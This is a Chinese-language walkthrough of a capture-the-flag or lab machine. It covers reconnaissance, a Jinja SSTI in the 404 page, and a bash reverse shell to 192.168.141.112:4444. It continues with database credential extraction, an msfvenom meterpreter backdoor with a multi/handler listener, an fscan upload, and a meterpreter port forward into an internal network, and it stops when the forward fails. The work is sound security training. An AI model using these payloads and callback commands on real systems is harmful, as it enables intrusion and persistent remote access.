信息搜集

1
arp-scan -l

PixPin_2026-08-02_16-14-13

扫描一下端口

image-20260802170841760

!!!怎么80没有开,访问网站也是访问不了不知道哪里出了问题。这里又换了成了VirtualBox打开,再扫一次

image-20260802171610105

后来又摸索了一下,发现是kali在nat模式,在桥接模式下的配置没有配好,桥接网卡选择本机的无线网卡就可以了。也是

image-20260803154108467

扫一下目录

1
gobuster dir -u http://192.168.141.109 -w medium.txt -x php,txt,zip,html

image-20260802172630957

漏洞利用

访问/login,/logout都会重定向到首页,抓包看一下

image-20260802173509761

啥也没有,就是写一个重定向,这里设计得很巧妙啊,没想到是在报错页面存在一个ssti,404页面抓个包

image-20260802174138333

然后就是反弹shell

1
{{request.application.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/192.168.141.112/4444 0>&1'").read()}}

image-20260803154815374

反弹成功之后接下来开始搜集信息,先看一下app.py

image-20260803155229475

主要信息有

1
2
3
4
app.secret_key = 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9'  --->Flag1{ Important findings } base64解码
pra = "pragma key='SecretssecretsSecrets...'"
con = sqlcipher.connect("static/db2.db")

接下来交互数据库获取信息

1
sqlcipher db2.db --interactice

image-20260803160042089

1
RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9 -->Flag3{ Hey, reading secrets  }

有了用户名和密码就可以登入了

image-20260803161124947

这里有隐藏的flag Flag2{ Is this the foothold I have been looking for?}

接下来继续分析,发现没有ip -a,ifcogfig等命令,使用

1
hostname -i

image-20260807202657830

接下里就是内网渗透了,由于环境限制没有办法使用工具扫描网段,且靶机不存在wget,curl等工具没把发下在工具,这个时候使用msf生成一个后门程序

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.112 LPORT=7777 -f elf -o ex.elf

将后门程序以base64文本传输,

1
cat ex.elf| base64 -w0

image-20260809094433527

由于权限问题要把后门写进/tmp目录

image-20260809094551063

增加一个权限

1
chmod +x ex.elf

然后在msf配置一下参数

1
2
3
4
5
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.141.112
set LPORT 7777
run

image-20260809094750400

配置好之后run开始监听,另一边靶机运行后门程序

1
./ex.elf

image-20260809094915323

接下来就是上传扫描工具了,这里上传的是fscan,

image-20260809095134766

把kali本机的fscan上传到靶机上,然后给一个执行权限

1
chmod +x fscan

上传之后就可以扫描靶机的c段

image-20260809095302137

这里报错是因为本机编译出来的 fscan 是在高版本系统编译,依赖 GLIBC 2.32、2.34,而这台靶机 Linux 系统自带的 glibc 版本更低,动态链接版本不匹配,运行时直接拒绝加载库文件。

解决方案

在本机的fscan目录下

1
CGO_ENABLED=0 go build -ldflags "-s -w -extldflags '-static'" -o fscan_static main_cli.go

静态编译,打包全部依赖,不依赖系统glibc

把重新生成的fscan_static传到靶机执行即可

image-20260809095645333

有两个存活主机192.168.100.1``192.16.100.100

其中192.168.100.1:443指纹识别为Apache/2.4.38(Debian),ProcessWire CMS,下一步就是访问这个服务,但是由于这是在内网没有办法直接访问,可以依靠现有 Meterpreter 会话做流量中转。

回到meterpreter会话

1
portfwd add -l 8443 -p 443 -r 192.168.100.1

image-20260809100229811

image-20260809105246558

然后这个端口就出问题了,没办法进行后续操作了